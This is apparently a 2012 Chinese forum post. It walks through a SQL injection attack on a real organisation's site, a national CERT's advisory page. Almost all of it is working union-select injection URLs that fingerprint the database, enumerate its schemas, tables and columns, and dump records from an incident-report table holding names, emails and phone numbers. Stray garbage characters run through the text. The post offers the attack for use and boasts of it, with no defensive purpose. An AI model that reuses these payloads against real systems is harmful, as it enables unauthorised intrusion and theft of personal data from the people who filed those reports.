1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询% J$ f' }% X# ~/ H( c
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解( U% _" h" Z1 m2 H% c5 x
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--; {! N; f) B9 n: g' Z% X* G: N
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
! g/ V- F7 t0 `3 N0 h3 a数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
6 V2 R! l X3 G8 F/ C% e. m5 V) f4.判断有没有写权限' C8 V9 W" f, P* \1 @( K
http://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限8 H9 o" \* a# u6 D) X
没办法,手动猜表啦; X2 J! U0 _& M
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
9 M+ b% [: V/ ?" B* H! x0 P但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下# c% c9 p& f2 J Y6 u0 x+ u
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
( T: x" q! \1 V* [. H' M. c成功查出所有数据库,国外的黑客就是不一般。数据库如下:
, H6 s8 b0 ?: F9 o6 N" w9 Z0 V8 Qinformation_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb
4 g, {0 x& t" h6 O" {- t: ?6.爆表,爆的是twcert库
% B( @4 A2 h; B$ {) rhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--. r1 P" i9 D/ k7 U5 [% G T
爆出如下表
, e' t3 p& @3 ?+ p: Vdownloadfile,irsys,newsdata,secrpt,secrpt_big5. Q" `: r. O8 O, V" d
7.爆列名,这次爆的是irsys表3 o* N; V! ^9 D0 G7 v
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
) r" m( x/ _' ^: i* e爆出如下列. R, v" r8 ]6 y. ]' x
ir_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status
5 @$ Z$ P: R' \' Z) d8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
% e& a6 F: s) _3 \6 q' `6 W, hhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
! |, g- M8 x- p6 a3 `8 E3 _9 L返回是3,说明每个列里有3个地段' Z" N( X2 I& m) F$ ~
9.爆字段内容
% H' T) w" O6 r- ]; C0 d ?http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
0 Q6 [1 G4 ]: B; B爆出name列的第一个字段的内容
" F' x2 a }0 x( H! ^8 A: O% f8 Zhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--: k. N5 w1 ]* p8 D. `$ h* ^: u
爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对